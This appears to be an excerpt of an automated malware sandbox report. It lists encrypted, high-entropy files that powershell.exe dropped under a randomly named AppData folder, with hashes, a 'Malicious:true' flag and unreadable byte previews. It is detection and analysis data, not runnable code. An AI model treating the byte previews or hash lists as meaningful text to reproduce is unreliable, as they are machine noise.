                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\EOgDvVdwRyGq.AGCtoqsYRm
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):185147
                                                                                                    Entropy (8bit):7.998913157057618
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:CRjvMx89OlA1fEzLGE4c4Gso4e+qq2guzmz8ESrfmBkdZKc0WbFtufUaEDT3a1JF:XFlA1kaEjso4/2gukurfmBk7UWRtuch0
                                                                                                    MD5:5AE412CBDEB5BE2C287A7EDF6D922719
                                                                                                    SHA1:BA2671F2F7B13358BB7EC91AA0C3769EFD2E9EA5
                                                                                                    SHA-256:A2057E4E97877095FB856752F7FE07D8EE77804C7B8A49F1A67EDAC656652057
                                                                                                    SHA-512:B31BC66A8B79006EB732E8A66D4E6B165487A3610C7544D88441A75767641BBA1523BE92EB606124C606A8CA89A773D5BABCCEB3BEC1E5D6961BE9CBE4FF6ACF
                                                                                                    Malicious:true
                                                                                                    Preview: ..wR..X~.W...Ai.A...."O+..._.|....].P.0b.....m...ps'&.09...i.h... .I.'6...,G..O..h..6..N..P..}+...L..sI<j....p.K5.{..B.1p.}..5.7.F........L...\...Pe.+GtL.....V4....x.Hu......^T.....!5......p.e......(....Kp~S.Q...vO....+a\3MzL.?r=..#._....Z*.j.w...=..2.[~...$..J..h.SEx.....7....8.]4S....R.idG.R.i..j.E.@.#.......0...@..W.v..w....@/...S.~..."0{6..jY1.g..OI4t...........6....S..A./...........??.O.(}X..n@....3%.k.]...|..J,.+M._.a....\.Z...D...8.A.n.@6I...@B.j..A......w....V..ym.....M.G...$y......,.9*.exCOz..=..(..S.K....$..BGn..m.....).Q;....IL....S0.....0....~;.k.F.....j$.*!..Vb2A.....7.$Z.....I.I....O...k.(.).B...q8.c........A..#58GD<............T.c...U.C.8..X.)..........6..J.O.(.......Nx.b...f....&^.'..9...w.EC]).2..X.I..-u.z.....yu...a..f......Q.i[..c..w..d..TW.....Vm:...H#......../!"._....*..;.h.P. ..4...m6d.....o..l....E.q...1......zc;.M!..Z.44.....j...M..a.QG".[t.K0.i..=.l..A._..."....[g.Sn...d...........G. .B.....g.
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\EUotKfksDBGZyH.nbeMulNAgGh
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):159068
                                                                                                    Entropy (8bit):7.998783460731139
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:fX2jbmJjRxPCiT9Lb5INx1XOoOQOufqFv4lanDPmSFTlnuWpVXcyAPy3GGL57y:fX8mJ36iTcxQoPOMq4WdBlnlHNMfGLZy
                                                                                                    MD5:0F49DD9F5A0324684F0709676C1C81FA
                                                                                                    SHA1:9DF2A48165769487F6BDFE3669E8E8589123ECAE
                                                                                                    SHA-256:B8AB01E1C3EC42D750735883AD3A5B01620983F400041AF7BAE6DF12089D2AA3
                                                                                                    SHA-512:301D2EB9F56828D4BBF07EBD83451F0B7E5B8AA97A3E67BF555D74A7C44EBBF93DF63B2E29B57558F1A172E2230397F6CFCF1EF783E0C13E58A04A96992685F6
                                                                                                    Malicious:true
                                                                                                    Preview: v....a.^....0f........`_.t:$.Nqf...)".r..X].....V....[.M.A.r..E.....#|..Q.....B.wBg..... ....w.N.N....\.<?.0'T{..yX.....E)..-..9..Z.;e..3.azk.7"...J.4+e.^.DZ{F..=..!....*.. z.^.....`n..?..M7...-F...6..h..D..%.z.6.....,..2z...K.......k.... Y....f&.O/...e..u..K....[.y.P.{.xv.6..%.].,.0t.b...........Gi..Z*..&>...7z$......d`R............T...x<C..... .5#.0.~..Z.O.'.TCk..P._.. C..2.=...n.......(2._Q.1.n....V.;.'......H......`...[=.m.,.[..E.O.^...%..kXb..P.....W{{&.B.:X..A.o}GI..a......F.(.|._..D..1..V..h..`.Y.....Q......hI...[u<.^.../T.....g...L..?.[....R...R.........~+..H.?F........A.T...v3i#...L..,.WT..............<..1.f.....m..{.2....*K...6.j.9M...c.@.,..q;.Bw..R........0....F.....J...3.w@...N.....c..#$*|..?.=O...<...8.RpL.~..`D...=.B...^....~Gb..F..DF.[L.0.mEF..gL.js...b..Q......v..A..].p......um...........?w+....(}.kvr.^L...g.aj....7*.'..]..Bk.L..L.o.e.HR.(....'#.N.R.D.....sF.lp.q8AGhz.rV.+....H[......d...Y..=U..O.wp....5d..Tq...hA.
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\EWHPbGfTDN.EVbAQjGoKnJvWNhqg
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):90009
                                                                                                    Entropy (8bit):7.998256488220185
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:EOqInXy14eWyh4nyt8SS8BLwEOLeV/38Tvi28r0AAspAtMqR88yJkKJr12yC3jZL:EqYXheGkYwdyVfEvQr0IAtinnn2xjHG2
                                                                                                    MD5:D8F3CAD3B1A9D16D0DACA0F7F5F492E9
                                                                                                    SHA1:6F26520AED11A8035CEFE46F616B772D40B706C2
                                                                                                    SHA-256:81854E1F752241DA97968DEAEC1D81EF15083C6157348894F28789DFB87582FB
                                                                                                    SHA-512:2CDBD7759F91FC84B0B00D8FC3DA8AF874103FE9101D25006A7390EAADE9703A71B18C04B43DCC9FAA60D55F976043A1E0210EF6432190AA367356B73AC8FE10
                                                                                                    Malicious:true
                                                                                                    Preview: .BX..W..}..C.....Ex.F...|.<.c/?/{G.H.X.A.....].CJ.TMa?.se.b.?.....8.|........a..V.........G^c..)..$..|....M.U_>.=..-.2o0..4.Y?N..w.s..fL\.5.Pz|!z..v\ .. ^..;~..`.lVSYfaL..v.&..8.#~....o=Ei..^.h.&. :i*v.}0......Q....C.)...5.K.e..j.r.T....u.xw.$i.>.SO.6.LF.....* ......)..et|.l..Q...X..mam...?...Wjt....p=z%......pC)`.w..}..(F.k..L.Q....Z......2&..Z!..f.%0H...\...T...[....M.=..........$6..1iY.G$aI..kZ_.F...8....%..).%...\.e..SM..x.1_j..j...p.."4. &Zq.L.....}....R....$)...z..d..l{-.}...h..M.l.=......<b...o.%..4.lIK.....?wt....'-...1.@.W...................%.a.JGp......O..{....5..0.C.z.H...+.kA.p,.J.!ICmB..tK..,W...H...b...U.T..Uw)..e.~.u.....u.*.(5!Y}$.....Y....A.^/0r].?.F..V9...-B..DAW...XR..:..I..........Y.....Q..R.WT.;..P.Zc./wi.wUcl....~..Bf..+!v...3.VR.(..TZP^.9..l....gs.V..7c.x.HC......*n...q..D...?...3j..u..Y.R...x=..qZ.:..3.)vbE.+5y.9..o..7.bh[..:.~...B.cd..h4Y....9..X...Kb.9..'h..P....(..]@[...S....&....u.).....b...D...}..R/.[&...G.l
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\EXzGhdsfHZg.lnIjRsvoNHPMOmct
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):158961
                                                                                                    Entropy (8bit):7.998996794121701
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:IheaQDdgoLkMpuxQ8MuKr1TxRHO255mw4Adl1jicDYtdU2J/c:MOD+oLRLuKr1TxRukmw4AdL2B50
                                                                                                    MD5:AECA965007B405FA800591908D8A2EA0
                                                                                                    SHA1:82D4C78450AA9B94A4127584DED724560AFF153D
                                                                                                    SHA-256:78A8FC679DFACDE8BD63ECD0EF2D1F3B30957722F2715F8ACC6F179C328DD751
                                                                                                    SHA-512:2ACBAF3CDF5D0BE2BF43F5726E0E41115A2B994A19BB227620AAB11942ABAE5767CD1E22CAF6E86214D7F18FE935FB864A11D7016EA5836C1B2DFC69E3DDDB67
                                                                                                    Malicious:true
                                                                                                    Preview: xo..)..L..".....@.C1....k.ph...0Z..{,...(b..Pq..|...*........iCm$@.....R*.Z.I.T;$@9/..a;..D...T....h.3P.p.A.....`.0.....%.g.'...E+..F..P. .E.:....$.V..M...j;..i.....Gb]..3..h.......C..;.........P.3...7\.iDf..2.~z..w.....e..-I..\...~..U.U.2.7.d3..&..)..5.^=. x[..\...O,....5.%..*&...2......5~..KV.3.U.H*t.5.l9...Qw*.zN.C5.....S......:.8v{...&[?,_.Z.=....ab.$u..i..e...!x....x.m@ja..*..%.mCQ...S.q...8-9..oL.......?....h..4....%..f...P....N.7x.......h/.i....G..&..M..<.B1<.s..<....u.2.7.&#.....k..~A.n.f.+pv..HRin.m.Sf.']..=,......c.j%.@zg.]LS.......].+s.....u.n......._...O..._.....@.8.Yv......O....N......#...&d....U.(..F...f..IkxM.[cY.g........j......?.>.L..D.Y[vP.l...cP.1R...Q.......g....N_..a.0]...3...i..,.Wj...6...."\......!C..e....A..{9...~.......1..wp'j...t.....6W...A..&!....m.T.AomT{.&6.k......1w.:5...I.gk.4.KyX......^.lL.ul..W.....V..u..D.c.6]b...r%.n#........_......%.....>....(..>2..@6.%.D.QA.VQ 7..7.U..._....!.~/.....<...gh*/...E7...P
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\EaKbvVgGCzecZ.VDlowjKUnbW
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):162926
                                                                                                    Entropy (8bit):7.998929969386267
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:1QQgCgmES3Zy89qXxmwVvPlOdd2jk6n2978ROEG4x38KMTEIl4vgri77aRHE:iQHxRZy89qXxmGlOdd2jk6U80VKMTEI0
                                                                                                    MD5:64CFF294F869C004065F6B370DCD01C8
                                                                                                    SHA1:C979940F03E97D64DD06552F2CD6DAB263B9C881
                                                                                                    SHA-256:B0CCABC9CCA0811F9A531701A73BA44E0B658CEC7AAA561ABB439CC1C219C86C
                                                                                                    SHA-512:DDEB7F5841795816E9782E770669A5ABB5780C7CA21C0E7D479C5182F015F157936126C3B3A9343F72F944F9452FE85CF49F8E0589BB235FD2ADEC96AA8061EA
                                                                                                    Malicious:true
                                                                                                    Preview: ......D../.I.!.@.W..l.Z89n.Y.1..}g. }~....Z...Dn!.......[.u..........&`>..pn..r.:..."...h.....E.O.AX.l/....=....v...<. .6.eV..(..j...~.r...*.>..3.d...]7G6eJ0.q......6.7.q~....4s".....w..HC(.)i..)....,.XLTA.>1...{P.D...O..U...7.....xR"i...Q.6..D..C...8*...a.p.B......y..F....i.2Q...^..Zm.5...J6O.F._.7v.W....Ho.....ZU.J.w`..n.b."...o.....j...S..............;L..i*..SC~....uf..[2...X.x....yX`.aq.^.~L..|<...$....4.VQG.B.6.4 B...Z...Rq...{^V=m._q+.. }.j..D.\...<.&....u.|.E......w9]y.V[f...Y^......i.~...~.L2B.(.Z..j{?f...J".D%r........r...4..X=.<..UO....f..r&.q.4.......WY.......{.W}...E..,.tC@$.)p..]o..6..t.fj.#.....).i5tn...Ea....7[..1.C..QNBG.=....9.<Qr.....@..L3......L...#...*..g.Z*.>...w|.4.....H..&I ....A....,............&!....h...\.....~>.T.....9Q9`e........!.."W....[..."... .)o..{.....d....3.=S..F.U..........$.. ..DT......q....&.#...#jY..Ly...j#s.0.....5'..0. .2UM..1S...i..hf.%sb...c..}[..Y.e+.......;.4N_u.[.9?.YgF5.E..
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\EeGqagumFA.AEtGIWkRbQPrYxHNF
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):131719
                                                                                                    Entropy (8bit):7.998594484386863
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:CRjvMx89OlA1fEzLGE4c4Gso4e+qq2guzmz8ESrfmBkdZKc0WbFt4:XFlA1kaEjso4/2gukurfmBk7UWRt4
                                                                                                    MD5:76E9E8C08BD489ED3E5BEF45F5C1AB3C
                                                                                                    SHA1:5F2A046B8EA25CA391BC7856EB9D49BFFF1ABFB3
                                                                                                    SHA-256:6758D03D488B2E83190FC8464229EFEF12082BB0167EAAA0CD0C0DE0581ABDBD
                                                                                                    SHA-512:48A112950D0B803D53B245CBE43E759C475236F3892298432B647A03B7DF68D6B6BCCAE115FFF16D7B4DF8EF20DD70D65973805B8EB6C7DD367E929820AADCED
                                                                                                    Malicious:true
                                                                                                    Preview: ..wR..X~.W...Ai.A...."O+..._.|....].P.0b.....m...ps'&.09...i.h... .I.'6...,G..O..h..6..N..P..}+...L..sI<j....p.K5.{..B.1p.}..5.7.F........L...\...Pe.+GtL.....V4....x.Hu......^T.....!5......p.e......(....Kp~S.Q...vO....+a\3MzL.?r=..#._....Z*.j.w...=..2.[~...$..J..h.SEx.....7....8.]4S....R.idG.R.i..j.E.@.#.......0...@..W.v..w....@/...S.~..."0{6..jY1.g..OI4t...........6....S..A./...........??.O.(}X..n@....3%.k.]...|..J,.+M._.a....\.Z...D...8.A.n.@6I...@B.j..A......w....V..ym.....M.G...$y......,.9*.exCOz..=..(..S.K....$..BGn..m.....).Q;....IL....S0.....0....~;.k.F.....j$.*!..Vb2A.....7.$Z.....I.I....O...k.(.).B...q8.c........A..#58GD<............T.c...U.C.8..X.)..........6..J.O.(.......Nx.b...f....&^.'..9...w.EC]).2..X.I..-u.z.....yu...a..f......Q.i[..c..w..d..TW.....Vm:...H#......../!"._....*..;.h.P. ..4...m6d.....o..l....E.q...1......zc;.M!..Z.44.....j...M..a.QG".[t.K0.i..=.l..A._..."....[g.Sn...d...........G. .B.....g.
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\EetxTnUuMRmVdSJrK.frolZptRyOaBkYzuALx
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):130981
                                                                                                    Entropy (8bit):7.998740882760857
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:xpkLfbtNsazMah80x7YBTA2bio68OIS55yFKu7tAp6VeJCo+97tEZB4:vWsjhmYi2u8OX+p726VURepE0
                                                                                                    MD5:D697566645ED8FB52B0925D917004254
                                                                                                    SHA1:744AE46718A473EBB7C46C854C5C5459717767DC
                                                                                                    SHA-256:D70F50A80449166ECCCFA2C7A4A9D6C6DFBBF0C32683B6A3B1584F5237E1388C
                                                                                                    SHA-512:C3D34A84FF46746DCD02F3A0367C06D8650D6AA3D27721FEEFE4D063779EA1A3A69031B5E6B69D7E66F7091C5CC889EABFE86661E9D8A47490FD74D8ABE2E595
                                                                                                    Malicious:true
                                                                                                    Preview: k..Dg..lpR.i_.Q.>O.).7]....z\..M.%.....4..6.Sae...Al.L.hf.7...O...P(.....&.jX.......G..3Ff......w.w.}[c.L..%...`#Z..F.cX..H.....q?...8..{....}GW..U.!NfE.z..G.S.p.u.^D%!...R...w..[ ..O.j....A.k.(..;.i.3.....^n...)2.nd...H.q\...1o...m.e:lx...|..9M.v...!..?K.,..<.L.7.:.*..........].....\.%.K....0..t..Kk..w..^@..|.B.ggl.<\.....n9J/o.T.X......WK../..........;<F1..2.!.....L.r.\...?,.c`rZ....r.^:F... }.......t..K...S...D\....xh...m.......O\.&+&.l..Xj...C.eJ.l"^*)O.k....E.q......C...YLY.J.yd...4......H.G%.S...o..(e........X..........qu..3....:....bX.2.sO..i...?..P.....I.~}..YN..Fh.K6.R.U2..\z.?..].s:..T.X.[....c..V...d.....!|6..24..-/..@T4f:........_.Er......A.w....I.../..H.'.0.<.q...kmlxM$...i....o.||..Y..^..;....@..0...c4...8........w.....sh....T....t...!..nm.......Z...p.V.H.2x.[8.D...UY..g.Tx......H<..KM.;.9.MC..c...BPl..P.*~...z.6:...br....I.qg.J..5h.e...vk.....NY....i..A....f....a.....Q.{....2\"..-A...#_N.h.k =...~.z..] \.Z..X$x?=.A....R.
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\EfabHONusAFd.OcSYDufXLtTabRBNKhZ
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65777
                                                                                                    Entropy (8bit):7.9972223356782335
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:q0JJuIvL0V24GZvjhz11uO6A8hYlWOsF6Jsjv3v:qAoIDe24ajhzXuj7YYOsF6Cj
                                                                                                    MD5:7DA91D174D171BF91A6AA1FA713194A8
                                                                                                    SHA1:2A4E2A2F701BE716DA6AED6DDACAE0194C419547
                                                                                                    SHA-256:51E403F5DF931EB2827973BF98F661D32A57489DB7B379EA15D620969786F4D4
                                                                                                    SHA-512:09F895BFF8E4A44079829C26A78E540B759A6A2AD0E0A8079F0370A03BEE533FC555F466C6C9A881EB257AA0C850520327BBDB6C92D84BCCAD6F769880033467
                                                                                                    Malicious:true
                                                                                                    Preview: .'..H.l.5~D..a.o.k"..-E...Ue.H..J..<..4...V5'j..j.rR.......6g.....h.....y....ry.r."......3..cB2._..W.j{c.O. .,/...].....~.j.Uf....S.0.L..P........n.Q.p.......c9^Y...~X.:..{u..z.aM..u..3.V.M..KKp.M'....j.Y$a..........^'..J..0)D.,.....^|I.c2&.........{sE..i.t/..X_"c....?.....S$.v...g..?L...+.3R_o..r...}.g.}..xDA..'9.G.$.3.|...J..ji.............+%~O.N.j..ri..P....A.u*...c...).(w%.l......oG..`.]......n.....6RH..c+zO.......N.}.l~... .)...0..i.&.B.4...VO....jbmbq..1.o...d..Ok_z.s.m.p.....I.HK.NB.".9..2.r~.t.v.T..s..H.q.R..R....=.V..:..X.Aii.|n\OY.h_.i..z..e..B.NX..Jj|..X..x2tQ......A...X..............:...1jd..\.ikw.5%.i......3....74..Kf..C!.T....}|.r.!MA..".7z..$.V.+$..hG.......l~k....bS\......7v.-.QW...K.'#3...T.....e....\...o...&W8k8z.+9L>U....o)..x...V:W..!. .-.Y.{.....p..; ...:...V..."...+m5...K.....;.O4....8..P.kO.}......_.-.-:.*..L...[....&V...K0.G....~.lw.....y.P....B.8.+.......$...x.F....L..A..7..{.........C...._^.q{.S^..5h-.n.X...g.}.r*....8?
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\EibUcfOkNaYIdv.SryhgGIeQaLE
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):150561
                                                                                                    Entropy (8bit):7.998897322649278
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:WSun6tmFFxmYsZCAq9KRFOp4q/ptEcoxMNjIDiTUyZ:W7mmcTZjq9KRFOpFbEhOhCiTUyZ
                                                                                                    MD5:5DE591232A23BA80BFF253C0F62DB267
                                                                                                    SHA1:4DDD21B416074DA35CC669267A0D2C2F5EB4CC1F
                                                                                                    SHA-256:FE4C17ECFB1A78F03ADDA915E3302FA49014B7809A211705450D00572BE2E092
                                                                                                    SHA-512:4EBCFB0672F9B7895126380FBAB9618962026436C4F50EAF5E607152C22AA997C2B8FA9CCA149750AB3680E408ECE6DFC177C985CD568BB46A4B2D66F7D56A6D
                                                                                                    Malicious:true
                                                                                                    Preview: j?.D..n.M1o..6)a.v.=?|(.........a..{..jq.z.c.*c..qhT..;.3....]iM..w.g....Q0`.d.rz..g.H..........a...6.9....^.......+...1...hV.km....-.E%SH.]...h.....!..oH..4..dc/D....W.c..'........2.V...}....h....*B..bHp..E...x..2......?..!.Rm.I..S.KR.t...!...VN\..}y....Ni......y....%......8.....hC....&~@...c.o.o..\..%l....z.Us..#@.~..H9.*..k....~.y.....L9.U..l/(j....z..L.$...s. K...m..+.V.......j..j..~......7.....h......$..T.&.1.o$.7kH..#e.`...Gc...m...A...o.d.Y.+c.Ow .S..q.]....o.)e.3.q..9x...}V.M.....4...B.c.Y..w...Y.w..\.Dj..K..fw+.0..'}e....o_.........Mmdj<.Y.|g.CE1...D.....u.8.....YH...)(1&.....A..n...O.X..Mlt*..V;.1ou....I.(.x..[...V^.{i)c.....H.......D..0.MUu.x&......K..N...1..m.B.......9$..O....H.X.T..X?E..k...f$.Q....'oj.k..=R....."V.N;........ x.H,..X.........#...bz.n..>..(>[.l..o.....y.......+.7.......*.|........2..L...30}..{._{V.......-....W....S.C..n.....p].@..D.F.....,.8..._'....`fEB.,........K.....X.ay}W.l.q.b.....w.enh.tqofx....x.e.
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\EoeGVRwyKBasI.fwPjkDqioW
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):101111
                                                                                                    Entropy (8bit):7.998266574556696
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:WU5K3Iavi4bvio6k6trHPQaEEGunnS6m2PUHRh:PlN4uo6k6tzQcGudUHf
                                                                                                    MD5:348DC4274F29FD7A96C0E6130D9D3E47
                                                                                                    SHA1:94ABA0D124B03F3183C9DA3BE1114D6F39F94663
                                                                                                    SHA-256:D961767F47EBE3ADE33FA3C11E391D9FEA73B3187B4A87FC0BC4E1ABB6C0AE80
                                                                                                    SHA-512:6CF6595282F1FB770D05ACCC239729CD970B259F6B63FE844322C095664FB1D7C9CDC8E1D896749303F534B129B54FD58EB02B816A4BF7B689EDE78245F390E4
                                                                                                    Malicious:true
                                                                                                    Preview: ~(..l.....v...ay.6..'....1.X...P!..J.].q..]...n.G.L.U.......)."Y..e.......;q:T..%.KM..'.....G@..0...#..r..i.DoQ ....y.=..b.P.8Oqm.P....W.(%.....7.C....8s.F.P",..S/;......0Q...........uR.]L.A.......K...@.r.f....O.F.h...".GjyvU..$.{b......id4f....<.2b}.....Q.u..I.6......[....:.>.-....9.\..Q........%f...6.p;y.....:5n.. rh.... I. z...C...j...o..4E.&ktF.r.U.W.O.nd.U...`...... ......x.E......h..9RNZo....._4..Hsc....[`...P..'.H:.4.4u.q..Kf...}..G...z.E..,.y.z.../.......4P%.AI..d.B...a.m^....M.v'..2......p...0..us.d.l.\6G=.2.g.s......).vu.s.....U....Xw.X.....2.....r.;..d..p\.i.*..p...&./.$~..`4]..8........Zcf...2z.9y.#.w..b<..~.G..d].;......d......Lc74....[...~.m..F.=..o.....;...#-m+-)....y..AE.3.-..~.!^.1.n@...PcA....T.A....T....7...'.8......)Y.#*s.0...g.V}46u..&.TbE...\.Ps..E....+...BLj;..l...L.....W.).4.l.8.?.Ei.8y...UM.3?.t.a@......z.nO....z.f."....@].....~.E.u'.3...Q..J...>.M.@=s...+..E}..S.2.^U..&R.d<2P...C4....:ir..?.f...Q....!..O
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\FVonIAliJzxHBbkCut.qsWrNvAwFReG
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):63151
                                                                                                    Entropy (8bit):7.996970025946243
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:HFZpt3p5cTzWILfe8wXm2jnfFmcaL81KG1S:lZp/5cfWifeDDjnfFVa41KG1S
                                                                                                    MD5:856F26B8EFD251A76BD55604A9FBA4EF
                                                                                                    SHA1:DB8198673BC8A50860844F208DE64875448B7B58
                                                                                                    SHA-256:3B6028F6631325C1CA4F1C101850BDBFB130301A53429C08596649F3C9131098
                                                                                                    SHA-512:14A0B8C39F6DBE21D16FB97F39A27D804488061E4201DF64C7E8D823FA4DD61F94944BC37A6941A87D9B750D66C9D568757C7ED3E286613F464FEAB0FDFC6D8D
                                                                                                    Malicious:true
                                                                                                    Preview: h.....;.......>...$4d."C.....r...0...B'%K....P.z..Kt...x.Y.r"..H?.Qy......m^...'3.@+@.f(..R.....ChG............!...N..~......Hm^.6...[.....{k(.s7}.....t~......x}].M.....l.Q..#.|#N..Np.._..j......>2h...9.PD.z.1..../.:....D...w9...J...s..]\.%.9x....!......O.].ot.8'.[~...P..M.q..7.|..6...;..E..@..v.."&5....l'.<.4s'...U....0i.0~./|..V.;....gqt.T.m].F]^It.t:>.!..W.....&..o)IX@.\/c.~Y6&r..(..8y.o...v.6LQ.5.....J...!.......O6.F.&.U.z.H..9=..Vd...i...*s...+.....2...W..=XU..l...HFV.-...\..o.U..t=..%?....RQ..Gn?a.}.Fr..!Z.k...<|)]1.r..+......x..-....:w.`..yQ....D.0C....h.....%wP.0m.}"....C........m"...C._..;Z...[BE.v...h.>.....pF..9.Z:q......L.).Lu..R..H.M........N.....K];c.g.G652.H.....b.f...y.0........wM\.. D.j._....Va..lur.6h.6.u....r%.{w!.D......r.f8.0...........Uh.....'........)...:~...Z..5....i.O.(.......E..o...-..*@..d+...K.;..Q...1.5../.....`..W{$.2...K...).`..b...d....}..%...._...6Sb..0..G).......k`.`..p.I%X$d...<zZ..sT.cY...f....r..
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\FiqrYmjEVZDB.XrINmGLDsli
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):50271
                                                                                                    Entropy (8bit):7.9959970835526955
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:kydElUT99KU/Eh3hofeiD5yBiym6Hzliw4wJo:kyd/p9ShhMeIkBPm6BRK
                                                                                                    MD5:96FFA6C182059DC0EC3F241A0C6570E5
                                                                                                    SHA1:AB9056666D4C11CF3A7FD9C1CC88EC41AC5D5836
                                                                                                    SHA-256:EC46CB54D17A7A1552C0A4A0BE9138E9E1CE703F9B7D4223EDB29D360332924F
                                                                                                    SHA-512:E32CEEF72CAAF86066853598B8630CB0E1BFE1EF23BE83252F08076FFEBCFADDE5DF4B60F91871DDE78332FCF2F67CC4BA9A28C8D328C0147BD8925017620321
                                                                                                    Malicious:true
                                                                                                    Preview: }..eg.kI`f.......].......P1...3|..gW.q.kb.#DoNu.,.Jr.w>......;..C>....9.h(.`7......."...U....y+..E&+..AOj.a..\..Eb.p..q....Z1........&..`.3.<c..].o.......p.8pz.&X.o{...H..=...C{..wP.>..8a.!.'c.I...o...2.w...-zd..~'...Br=.ik}.7..?....tS.CR(...d.....m.wN.A.1... .nq.....SR..c.....l...@Tg.U.E._O...P.....w...U<.p'mQe.-.`z...B.....W.,........(.7.T..3.&.V...,A.-....cdM......T.G$9..4..D.[pl.b.< ..c.^Vg{5.....i.".. 6}WHG=.~.R.Q.>..H.@.{FM.....F.:..B.=...>.J..`h.c.N..../..|.7...K..A.:...1=."J.]..#tg1...2x....>...a......s...J..f?......3n..A....X.]..K.[.x*.q.-......^.u>..J.T..Y.k.e.!HS....C.~Lf.,.....V.Y.Z.&.e...v.H`.G.PI....L...k...{..G.d....n.5s.y8.\......!.............].)#...,.[.3V.>`..x.n..U&2....5.u_......k..P..Ke.p.!i.9p............b.....K'..q./.a..HX&.....T..R.+l....rR..HX.h.X..]/.......?.GR.Fy,.....>8E......+h.../J....8...!.,Y,.Hg..."6q%.l...YJ..M.I.ed.E..y .y...!.4.(.^l.ml...../..Q9...HvF.......7?.Z$....a.l.K.l3?..~.Y.aeg.z]WPL.D
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\FoxdBJZvjzOnE.jYgZzfUpAWbcQILqnJk
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):55863
                                                                                                    Entropy (8bit):7.9964192510594305
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:A17gBlBnymaJ9Zt316ttURhioHMN82tQvrO:a8l9Y9ctwioHMgvrO
                                                                                                    MD5:99A49EE68DF479BFA56B442E08C1329B
                                                                                                    SHA1:6489856DB8069E213BA07158B7D073787821820B
                                                                                                    SHA-256:F09D0C9546453248A993C9676A7BAC72082D631A664B302846FEEE5937E1B273
                                                                                                    SHA-512:6532AFCB111FF5A2009389B2F45814ED50C3DE9AEBC961C120CD4DDC7E95FDE17ED670146B9258AED0CADF9DA12306B9B60975326EE07369052781D902847A78
                                                                                                    Malicious:true
